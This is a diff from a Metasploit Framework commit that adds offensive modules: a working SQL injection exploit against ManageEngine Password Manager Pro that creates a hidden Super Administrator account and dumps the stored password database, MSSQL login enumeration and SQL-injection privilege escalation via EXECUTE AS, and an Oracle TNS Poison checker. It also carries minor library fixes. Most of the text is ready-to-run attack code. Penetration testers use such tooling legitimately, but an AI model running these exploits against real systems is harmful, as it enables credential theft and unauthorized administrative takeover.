rescue Rex::AddressInUse => e
rescue Rex::InvalidDestination => e
log_error(e.message)
rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError
self.client.kill

4
lib/rex/socket/comm/local.rb
View File

@ -195,7 +195,7 @@ class Rex::Socket::Comm::Local
rescue ::Errno::EADDRNOTAVAIL,::Errno::EADDRINUSE
sock.close
raise Rex::AddressInUse.new(param.localhost, param.localport), caller
raise Rex::BindFailed.new(param.localhost, param.localport), caller
end
end
@ -295,7 +295,7 @@ class Rex::Socket::Comm::Local
rescue ::Errno::EADDRNOTAVAIL,::Errno::EADDRINUSE
sock.close
raise Rex::AddressInUse.new(ip, port), caller
raise Rex::InvalidDestination.new(ip, port), caller
rescue Errno::ETIMEDOUT
sock.close

4
lib/rex/ui/text/output/file.rb
View File

@ -14,8 +14,8 @@ class Output::File < Rex::Ui::Text::Output
attr_accessor :fd
def initialize(path)
self.fd = ::File.open(path, "wb")
def initialize(path, mode='wb')
self.fd = ::File.open(path, mode)
end
def supports_color?

2
metasploit-framework.gemspec
View File

@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
#spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter on Windows, soon others.
spec.add_runtime_dependency 'meterpreter_bins', '0.0.10'
spec.add_runtime_dependency 'meterpreter_bins', '0.0.11'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# Needed by anemone crawler

328
modules/auxiliary/admin/http/manageengine_pmp_privesc.rb Normal file
View File

@ -0,0 +1,328 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection',
'Description' => %q{
ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection
vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate
privileges and obtain Super Administrator access. A Super Administrator can then
use his privileges to dump the whole password database in CSV format. PMP can use
both MySQL and PostgreSQL databases but this module only exploits the latter as
MySQL does not support stacked queries with Java. PostgreSQL is the default database
in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,
so a higher version does not guarantee exploitability. This module has been tested
on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in
v7.1 build 7105 and above.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-8499' ],
[ 'OSVDB', '114485' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ]
],
'DisclosureDate' => 'Nov 8 2014'))
register_options(
[
Opt::RPORT(7272),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'The username to login as', 'guest']),
OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']),
OptString.new('TARGETURI', [ true, "Password Manager Pro application URI", '/'])
], self.class)
end
def login(username, password)
# 1st step: we obtain a JSESSIONID cookie...
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc')
})
if res && res.code == 200
# 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions)
if res.body && res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/
orgn_name = $1
else
orgn_name = nil
end
if res.body && res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/
authrule_name = $1
else
authrule_name = nil
end
# 3rd step: we try to get the domainName for the user
cookie = res.get_cookies
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login', 'AjaxResponse.jsp'),
'ctype' => "application/x-www-form-urlencoded",
'cookie' => cookie,
'vars_get' => {
'RequestType' => 'GetUserDomainName',
'userName' => username
}
})
if res && res.code == 200 && res.body
domain_name = res.body.to_s.strip
else
domain_name = nil
end
# 4th step: authenticate to j_security_check, follow the redirect to PassTrixMain.cc and get its cookies.
# For some reason send_request_cgi! doesn't work, so follow the redirect manually...
vars_post = {
'j_username' => username,
'username' => username,
'j_password' => password
}
vars_post['ORGN_NAME'] = orgn_name if orgn_name
vars_post['AUTHRULE_NAME'] = authrule_name if authrule_name
vars_post['domainName'] = domain_name if domain_name
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'j_security_check;' + cookie.to_s.gsub(';','')),
'ctype' => "application/x-www-form-urlencoded",
'cookie' => cookie,
'vars_post' => vars_post
})
if res && res.code == 302
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'PassTrixMain.cc'),
'cookie' => cookie,
})
if res && res.code == 200
# 5th step: get the c ookies sent in the last response
return res.get_cookies
end
end
end
return nil
end
def inject_sql(old_style)
# On versions older than 7000 the injection is slightly different (we call it "old style").
# For "new style" versions we can escalate to super admin by doing
# "update aaaauthorizedrole set role_id=1 where account_id=#{user_id};insert into ptrx_superadmin values (#{user_id},true);"
# However for code simplicity let's just create a brand new user which works for both "old style" and "new style" versions.
if old_style
sqli_prefix = '\\\'))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") as ' + Rex::Text.rand_text_alpha_lower(rand(8)+3) + ";"
else
sqli_prefix = '\\\'))))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") AS Ptrx_DummyPwds GROUP BY "PTRX_RID","PTRX_RNAME","PTRX_DESC","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24") as ' + Rex::Text.rand_text_alpha_lower(rand(8)+3) + ";"
end
user_id = Rex::Text.rand_text_numeric(4)
time = Rex::Text.rand_text_numeric(8)
username = Rex::Text.rand_text_alpha_lower(6)
username_chr = ""
username.each_char do |c|
username_chr << 'chr(' << c.ord.to_s << ')||'
end
username_chr.chop!.chop!
password = Rex::Text.rand_text_alphanumeric(10)
password_chr = ""
password.each_char do |c|
password_chr << 'chr(' << c.ord.to_s << ')||'
end
password_chr.chop!.chop!
group_chr = ""
'Default Group'.each_char do |c|
group_chr << 'chr(' << c.ord.to_s << ')||'
end
group_chr.chop!.chop!
sqli_command =
"insert into aaauser values (#{user_id},$$$$,$$$$,$$$$,#{time},$$$$);" +
"insert into aaapassword values (#{user_id},#{password_chr},$$$$,0,2,1,#{time});" +
"insert into aaauserstatus values (#{user_id},$$ACTIVE$$,#{time});" +
"insert into aaalogin values (#{user_id},#{user_id},#{username_chr});" +
"insert into aaaaccount values (#{user_id},#{user_id},1,1,#{time});" +
"insert into aaaauthorizedrole values (#{user_id},1);" +
"insert into aaaaccountstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});" +
"insert into aaapasswordstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});" +
"insert into aaaaccadminprofile values (#{user_id},$$" + Rex::Text.rand_text_alpha_upper(8) + "$$,-1,-1,-1,-1,-1,false,-1,-1,-1,$$$$);" +
"insert into aaaaccpassword values (#{user_id},#{user_id});" +
"insert into ptrx_resourcegroup values (#{user_id},3,#{user_id},0,0,0,0,#{group_chr},$$$$);" +
"insert into ptrx_superadmin values (#{user_id},true);"
sqli_suffix = "-- "
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "SQLAdvancedALSearchResult.cc"),
'cookie' => @cookie,
'vars_post' => {
'COUNT' => Rex::Text.rand_text_numeric(2),
'SEARCH_ALL' => sqli_prefix + sqli_command + sqli_suffix,
'USERID' => Rex::Text.rand_text_numeric(4)
}
})
return [ username, password ]
end
def get_version
res = send_request_cgi({
'uri' => normalize_uri("PassTrixMain.cc"),
'method' => 'GET'
})
if res && res.code == 200 && res.body &&
res.body.to_s =~ /ManageEngine Password Manager Pro/ &&
(
res.body.to_s =~ /login\.css\?([0-9]+)/ || # PMP v6
res.body.to_s =~ /login\.css\?version=([0-9]+)/ || # PMP v6
res.body.to_s =~ /\/themes\/passtrix\/V([0-9]+)\/styles\/login\.css"/ # PMP v7
)
return $1.to_i
else
return 9999
end
end
def check
version = get_version
case version
when 0..7104
return Exploit::CheckCode::Appears
when 7105..9998
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Unknown
end
end
def run
unless check == Exploit::CheckCode::Appears
print_error("#{peer} - Fingerprint hasn't been successful, trying to exploit anyway...")
end
version = get_version
@cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
if @cookie == nil
fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate.")
end
creds = inject_sql(version < 7000 ? true : false)
username = creds[0]
password = creds[1]
print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}")
cookie_su = login(username, password)
if cookie_su.nil?
fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.")
end
print_status("#{peer} - Reporting Super Administrator credentials...")
report_super_admin_creds(username, password)
print_status("#{peer} - Leaking Password database...")
loot_passwords(cookie_su)
end
def report_super_admin_creds(username, password)
status = Metasploit::Model::Login::Status::SUCCESSFUL
service_data = {
address: rhost,
port: rport,
service_name: 'https',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_type: :password,
private_data: username,
username: password
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
access_level: 'Super Administrator',
status: status,
last_attempted_at: DateTime.now
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
def loot_passwords(cookie_admin)
# 1st we turn on password exports
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'ConfigureOffline.ve'),
'cookie' => cookie_admin,
'vars_post' => {
'IS_XLS' => 'true',
'includePasswd' => 'true',
'HOMETAB' => 'true',
'RESTAB' => 'true',
'RGTAB' => 'true',
'PASSWD_RULE' => 'Offline Password File',
'LOGOUT_TIME' => '20'
}
})
# now get the loot!
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'jsp', 'xmlhttp', 'AjaxResponse.jsp'),
'cookie' => cookie_admin,
'vars_get' => {
'RequestType' => 'ExportResources'
}
})
if res && res.code == 200 && res.body && res.body.to_s.length > 0
vprint_line(res.body.to_s)
print_good("#{peer} - Successfully exported password database from Password Manager Pro.")
loot_name = 'manageengine.passwordmanagerpro.password.db'
loot_type = 'text/csv'
loot_filename = 'manageengine_pmp_password_db.csv'
loot_desc = 'ManageEngine Password Manager Pro Password DB'
p = store_loot(
loot_name,
loot_type,
rhost,
res.body,
loot_filename,
loot_desc)
print_status("#{peer} - Password database saved in: #{p}")
else
print_error("#{peer} - Failed to export Password Manager Pro passwords.")
end
end
end

172
modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb Normal file
View File

@ -0,0 +1,172 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration',
'Description' => %q{
This module can be used to obtain a list of all logins from a SQL Server with any login.
Selecting all of the logins from the master..syslogins table is restricted to sysadmins.
However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server
logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is
pretty simple, because the principal IDs assigned to logins are incremental. Once logins
have been enumerated they can be verified via sp_defaultdb error analysis. This is
important, because not all of the principal IDs resolve to SQL logins (some resolve to
roles instead). Once logins have been enumerated, they can be used in dictionary attacks.
},
'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],
'License' => MSF_LICENSE,
'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms174427.aspx']]
))
register_options(
[
OptInt.new('FuzzNum', [true, 'Number of principal_ids to fuzz.', 300]),
], self.class)
end
def run
# Check connection and issue initial query
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
if mssql_login_datastore
print_good('Connected.')
else
print_error('Login was unsuccessful. Check your credentials.')
disconnect
return
end
# Query for sysadmin status
print_status("Checking if #{datastore['USERNAME']} has the sysadmin role...")
user_status = check_sysadmin
# Check if user has sysadmin role
if user_status == 1
print_good("#{datastore['USERNAME']} is a sysadmin.")
else
print_status("#{datastore['USERNAME']} is NOT a sysadmin.")
end
# Get a list if sql server logins using SUSER_NAME()
print_status("Setup to fuzz #{datastore['FuzzNum']} SQL Server logins.")
print_status('Enumerating logins...')
sql_logins_list = get_sql_logins
if sql_logins_list.nil? || sql_logins_list.empty?
print_error('Sorry, somethings went wrong - SQL Server logins were found.')
disconnect
return
else
# Print number of initial logins found
print_good("#{sql_logins_list.length} initial SQL Server logins were found.")
sql_logins_list.sort.each do |sql_login|
if datastore['VERBOSE']
print_status(" - #{sql_login}")
end
end
end
# Verify the enumerated SQL Logins using sp_defaultdb error ananlysis
print_status('Verifying the SQL Server logins...')
sql_logins_list_verified = verify_logins(sql_logins_list)
if sql_logins_list_verified.nil?
print_error('Sorry, no SQL Server logins could be verified.')
disconnect
return
else
# Display list verified SQL Server logins
print_good("#{sql_logins_list_verified.length} SQL Server logins were verified:")
sql_logins_list_verified.sort.each do |sql_login|
print_status(" - #{sql_login}")
end
end
disconnect
end
# Checks if user is a sysadmin
def check_sysadmin
# Setup query to check for sysadmin
sql = "select is_srvrolemember('sysadmin') as IsSysAdmin"
# Run query
result = mssql_query(sql)
# Parse query results
parse_results = result[:rows]
status = parse_results[0][0]
# Return status
return status
end
# Gets trusted databases owned by sysadmins
def get_sql_logins
# Create array to store the sql logins
sql_logins = []
# Fuzz the principal_id parameter passed to the SUSER_NAME function
(1..datastore['FuzzNum']).each do |principal_id|
# Setup query
sql = "SELECT SUSER_NAME(#{principal_id}) as login"
# Execute query
result = mssql_query(sql)
# Parse results
parse_results = result[:rows]
sql_login = parse_results[0][0]
# Add to sql server login list
sql_logins.push(sql_login) unless sql_logins.include?(sql_login)
end
# Return list of logins
sql_logins
end
# Checks if user has the db_owner role
def verify_logins(sql_logins_list)
# Create array for later use
verified_sql_logins = []
fake_db_name = Rex::Text.rand_text_alpha_upper(24)
# Check if the user has the db_owner role is any databases
sql_logins_list.each do |sql_login|
# Setup query
sql = "EXEC sp_defaultdb '#{sql_login}', '#{fake_db_name}'"
# Execute query
result = mssql_query(sql)
# Parse results
parse_results = result[:errors]
result = parse_results[0]
# Check if sid resolved to a sql login
if result.include?(fake_db_name)
verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)
end
# Check if sid resolved to a sql login
if result.include?('alter the login')
# Add sql server login to verified list
verified_sql_logins.push(sql_login) unless verified_sql_logins.include?(sql_login)
end
end
verified_sql_logins
end
end

2
modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb
View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Microsoft SQL Server - Escalate EXECUTE AS',
'Description' => %q{
This module can be used escalate privileges if the IMPERSONATION privilege has been
assigned to the user. In most cases this results in additional data access, but in
assigned to the user. In most cases, this results in additional data access, but in
some cases it can be used to gain sysadmin privileges.
},
'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],

201
modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb Normal file
View File

@ -0,0 +1,201 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL_SQLI
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server - SQLi Escalate Execute As',
'Description' => %q{
This module can be used escalate privileges if the IMPERSONATION privilege has been
assigned to the user via error based SQL injection. In most cases, this results in
additional data access, but in some cases it can be used to gain sysadmin privileges.
The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--
},
'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],
'License' => MSF_LICENSE,
'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms178640.aspx']]
))
end
def run
# Get the database user name
print_status("#{peer} - Grabbing the database user name...")
db_user = get_username
if db_user.nil?
print_error("#{peer} - Unable to grab user name...")
return
else
print_good("#{peer} - Database user: #{db_user}")
end
# Grab sysadmin status
print_status("#{peer} - Checking if #{db_user} is already a sysadmin...")
admin_status = check_sysadmin
if admin_status.nil?
print_error("#{peer} - Couldn't retrieve user status, aborting...")
return
elsif admin_status == '1'
print_error("#{peer} - #{db_user} is already a sysadmin, no escalation needed.")
return
else
print_status("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.")
end
# Get list of users that can be impersonated
print_status("#{peer} - Enumerating a list of users that can be impersonated...")
imp_user_list = check_imp_users
if imp_user_list.nil? || imp_user_list.empty?
print_error("#{peer} - Sorry, the current user doesnt have permissions to impersonate anyone.")
return
else
# Display list of users that can be impersonated
print_good("#{peer} - #{imp_user_list.length} users can be impersonated:")
imp_user_list.each do |dbuser|
print_status("#{peer} - #{dbuser}")
end
end
# Check if any of the users that can be impersonated are sysadmins
print_status("#{peer} - Checking if any of them are sysadmins...")
imp_user_sysadmin = check_imp_sysadmin(imp_user_list)
if imp_user_sysadmin.nil?
print_error("#{peer} - Sorry, none of the users that can be impersonated are sysadmins.")
return
end
# Attempt to escalate to sysadmin
print_status("#{peer} - Attempting to impersonate #{imp_user_sysadmin}...")
escalate_privs(imp_user_sysadmin,db_user)
admin_status = check_sysadmin
if admin_status && admin_status == '1'
print_good("#{peer} - Success! #{db_user} is now a sysadmin!")
else
print_error("#{peer} - Fail buckets, something went wrong.")
end
end
def get_username
# Setup query to check for database username
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+SYSTEM_USER+'#{clue_end}')"
# Run query
result = mssql_query(sql)
# Parse result
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
user_name = $1
else
user_name = nil
end
user_name
end
def check_sysadmin
# Setup query to check for sysadmin
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin'))as varchar)+'#{clue_end}')"
# Run query
result = mssql_query(sql)
# Parse result
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
status = $1
else
status = nil
end
status
end
def check_imp_users
# Setup query to check for trusted databases owned by sysadmins
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
# Setup query
sql = "(select cast((SELECT DISTINCT '#{clue_start}'+b.name+'#{clue_end}'
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE' for xml path('')) as int))"
# Run query
res = mssql_query(sql)
unless res && res.body
return nil
end
#Parse results
parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
if parsed_result && !parsed_result.empty?
parsed_result.flatten!
parsed_result.uniq!
end
parsed_result
end
def check_imp_sysadmin(imp_user_list)
# Check if the user has the db_owner role is any databases
imp_user_list.each do |imp_user|
# Setup query
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin','#{imp_user}'))as varchar)+'#{clue_end}')"
# Run query
result = mssql_query(sql)
unless result && result.body
next
end
#Parse results
parsed_result = result.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
if parsed_result && !parsed_result.empty?
parsed_result.flatten!
parsed_result.uniq!
end
# check if user is a sysadmin
if parsed_result && parsed_result[0] == '1'
print_good("#{peer} - #{imp_user} is a sysadmin!")
return imp_user
else
print_status("#{peer} - #{imp_user} is NOT a sysadmin")
end
end
nil
end
# Attempt to escalate privileges
def escalate_privs(imp_user,db_user)
# Setup Query - Impersonate the first sysadmin user on the list
evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember 'MyUser1','sysadmin';Revert;--"
# Execute Query
mssql_query(evil_sql)
end
end

4
modules/auxiliary/gather/eventlog_cred_disclosure.rb
View File

@ -19,8 +19,8 @@ class Metasploit3 < Msf::Auxiliary
allow an unauthenticated user to obtain the superuser password of any managed Windows and
AS/400 hosts. This module abuses both vulnerabilities to collect all the available
usernames and passwords. First the agentHandler servlet is abused to get the hostid and
slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames
and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7
slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
the TARGETURI has to be prepended with /event.
},
'Author' =>

6
modules/auxiliary/gather/xerox_pwd_extract.rb
View File

@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary
begin
connect(true, 'RPORT' => jport)
sock.put(create_print_job)
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
print_error("#{rhost}:#{jport} - Error connecting to #{rhost}")
ensure
disconnect
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
res = sock.get_once || ''
passwd = res.match(/\r\n\s(.+?)\n/)
return passwd ? passwd[1] : ''
rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse, EOFError
rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, ::EOFError
print_error("#{rhost}:#{jport} - Error getting password from #{rhost}")
return
ensure
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
begin
connect(true, 'RPORT' => jport)
sock.put(remove_print_job)
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}")
ensure
disconnect

52
modules/auxiliary/scanner/oracle/tnspoison_checker.rb Normal file
View File

@ -0,0 +1,52 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::TNS
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle TNS Listener Checker',
'Description' => %q{
This module checks the server for vulnerabilities like TNS Poison.
Module sends a server a packet with command to register new TNS Listener and checks
for a response indicating an error. If the registration is errored, the target is not
vulnearble. Otherwise, the target is vulnerable to malicious registrations.
},
'Author' => ['ir0njaw (Nikita Kelesis) <nikita.elkey[at]gmail.com>'], # of Digital Security [http://dsec.ru]
'References' =>
[
[ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ],
],
'DisclosureDate' => 'Apr 18 2012',
'License' => MSF_LICENSE))
register_options(
[
Opt::RPORT(1521)
], self.class)
deregister_options('RHOST') # Provided by the TNS mixin, but not needed in a scanner module
end
def run_host(ip)
begin
connect
send_packet = tns_packet("(CONNECT_DATA=(COMMAND=service_register_NSGR))")
sock.put(send_packet)
packet = sock.read(100)
find_packet = packet.include? "(ERROR_STACK=(ERROR="
find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable")
#TODO: Module should report_vuln if this finding is solid.
rescue ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{ip}:#{rport} unable to connect to the server")
end
end
end

Some files were not shown because too many files have changed in this diff Show More